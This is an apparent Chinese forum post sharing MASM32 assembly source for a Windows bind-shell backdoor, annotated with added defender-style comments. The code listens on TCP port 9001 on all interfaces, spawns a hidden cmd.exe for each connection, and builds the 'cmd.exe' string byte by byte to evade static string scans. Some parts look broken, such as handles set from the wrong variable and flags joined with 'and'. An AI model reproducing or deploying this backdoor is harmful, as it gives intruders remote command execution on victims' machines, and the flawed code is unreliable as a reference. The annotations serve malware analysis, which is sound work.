
[Visual Studio文章] winsock 后门源码 



; ======================================================================
; Analysis notes (added on review, written from the defender's side)
;
; What this listing is: a 32-bit Win32 TCP "bind shell" backdoor for
; MASM32.  It creates a TCP socket, binds it to INADDR_ANY (all
; interfaces) on port 9001, listens, accepts one connection, and then
; starts "cmd.exe" with a hidden window, bInheritHandles = TRUE and a
; STARTUPINFO whose std-handle fields are set from the `knob` variable.
; After CreateProcess returns, execution falls through into the accept
; label again, so every further connection spawns another cmd.exe.
;
; Observables an analyst can take from this source alone:
;   * import/call chain WSAStartup -> socket -> bind -> listen -> accept
;     followed by CreateProcess with STARTF_* flags and std handles set,
;     i.e. socket-to-child-process handle redirection;
;   * an unexpected listener on TCP/9001 bound to 0.0.0.0;
;   * the text "cmd.exe" is not stored as a literal: it is written into
;     the `yay` buffer one byte at a time at run time (the commented-out
;     `yay db 99,109,...` shows the same bytes), presumably to keep the
;     literal out of the binary's string table - a static string scan
;     for "cmd.exe" would not match this sample.
;
; Reading order: the labels are laid out out of order and chained by
; unconditional jmps.  Actual control flow is
;   start -> sox -> inf -> attch -> lewp -> acpt -> strinf -> duh -> cnt
;   -> next -> goodjunk -> (fall through into) acpt -> ...
; A SOCKET_ERROR from bind or listen, or a non-zero WSAStartup result,
; jumps to `exit`.
; ======================================================================
.486
.model flat, STDCALL                    ; 32-bit flat model; STDCALL = callee pops args
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\ws2_32.inc      ; Winsock 2 API declarations
includelib \masm32\lib\ws2_32.lib
.data?                                  ; (empty uninitialised section)
.data

; ---------- tubeet vars
wsDat WSADATA <>                        ; filled in by WSAStartup
tooby sockaddr_in <>                    ; local address the listener binds to
tube SOCKET ?                           ; listening socket
; Client vars
Client SOCKET ?                         ; accepted connection; only read by closesocket at exit

; ---------- Redirection stuff
abc STARTUPINFO <>                      ; STARTUPINFO passed to CreateProcess
xyz PROCESS_INFORMATION <>              ; receives the spawned process/thread handles
knob HANDLE ?                           ; copy of the listening socket handle (see sox)
;welcome db "Example backdoor", 13, 10, 0
;yay db 99, 109, 100, 46, 101, 120, 101 ; cmd.exe
yay db 8 dup (?)                        ; 8-byte buffer; receives "cmd.exe",0 at run time

.code
start:
    nop
    nop
    nop

    ; Build the NUL-terminated string "cmd.exe" byte by byte instead of
    ; declaring it as a literal (see the analysis notes at the top).
    mov [yay+0], 99d                    ; 'c'
    mov [yay+1], 109d                   ; 'm'
    mov [yay+2], 100d                   ; 'd'
    mov [yay+3], 46d                    ; '.'
    mov [yay+4], 101d                   ; 'e'
    mov [yay+5], 120d                   ; 'x'
    mov [yay+6], 101d                   ; 'e'
    mov [yay+7], 0                      ; terminator

; WSAStartup(0x0202, &wsDat): request Winsock 2.2; non-zero return = failure -> exit
lea eax, wsDat
push eax
push 0202h
call WSAStartup
cmp eax, 0
jne exit
xor eax, eax
jmp sox

; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); the handle is stored twice,
; in `tube` (used by bind/listen/accept) and in `knob` (used below when
; the STARTUPINFO std-handle fields are filled in).
sox:
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call socket
mov tube, eax
mov knob, eax
xor eax, eax
jmp inf

; Reached from cnt: sets abc.hStdError from `knob`, then proceeds to
; goodjunk, which calls CreateProcess.
next:
lea eax, knob
mov abc.hStdError, eax
jmp goodjunk
duh:
mov abc.wShowWindow, SW_HIDE            ; spawned cmd.exe gets no visible window
jmp cnt

; Reached from acpt after a connection was accepted: initialises the
; STARTUPINFO used for the child process.
strinf:
mov abc.cb, 68d                         ; sizeof(STARTUPINFO) on 32-bit Windows
mov abc.dwFlags, STARTF_USESTDHANDLES and STARTF_USESHOWWINDOW ; assemble-time expression of the two STARTF_ constants
jmp duh

; Sets abc.hStdInput and abc.hStdOutput from `knob`, then continues at next.
cnt:
lea eax, knob
mov abc.hStdInput, eax
lea eax, knob
mov abc.hStdOutput, eax
jmp next


; Fill in the listen address: AF_INET, sin_addr = 0 (INADDR_ANY, i.e.
; every interface), sin_port = htons(9001).  The hard-coded port is the
; most direct network indicator for this sample.
inf:
mov tooby.sin_family, AF_INET
mov tooby.sin_addr, 0
push 9001d ; OVER 9000!!!  - listen port in host order
call htons
mov tooby.sin_port, ax                  ; htons returns the 16-bit result in ax
xor eax, eax
jmp attch

; listen(tube, 1): backlog of one; SOCKET_ERROR -> exit
lewp:
push 1
push tube
call listen
cmp eax, SOCKET_ERROR
je exit
xor eax, eax
jmp acpt

; CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE /*inherit handles*/, 0,
;               NULL, NULL, &abc, &xyz)
; Arguments are pushed right-to-left per STDCALL.  The return value is
; not checked; execution falls straight through into acpt afterwards, so
; the listener keeps accepting connections and spawning processes.
goodjunk:
lea eax, xyz
push eax                                ; lpProcessInformation
lea eax, abc
push eax                                ; lpStartupInfo
push 0                                  ; lpCurrentDirectory
push 0                                  ; lpEnvironment
push 0                                  ; dwCreationFlags
push 1                                  ; bInheritHandles = TRUE
push 0                                  ; lpThreadAttributes
push 0                                  ; lpProcessAttributes
nop
nop
lea eax, yay
push eax                                ; lpCommandLine = "cmd.exe"
push 0                                  ; lpApplicationName = NULL
call CreateProcess
xor cx, cx                              ; 16-bit partial write; no later instruction reads cx

; accept(tube, NULL, NULL): blocks until a client connects; the accepted
; socket is kept in `Client`, then the STARTUPINFO setup at strinf runs.
acpt:
push 0
push 0
push tube
call accept
mov Client, eax

jmp strinf

; bind(tube, &tooby, 16): 16 = sizeof(sockaddr_in); SOCKET_ERROR -> exit
attch:
push 16
lea eax, tooby
push eax
push tube
call bind
cmp eax, SOCKET_ERROR
je exit
xor eax, eax
jmp lewp

; Error/termination path: closesocket(Client), WSACleanup(), ExitProcess(0).
; Note that `tube` is never closed here, and on the WSAStartup/bind/listen
; failure paths `Client` has not been assigned yet.
exit:
push Client
call closesocket
call WSACleanup

push 0
call ExitProcess

ret                                     ; unreachable: ExitProcess does not return
end start


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
发帖时间:2016-7-9   |   查看数:0   |   回复数:0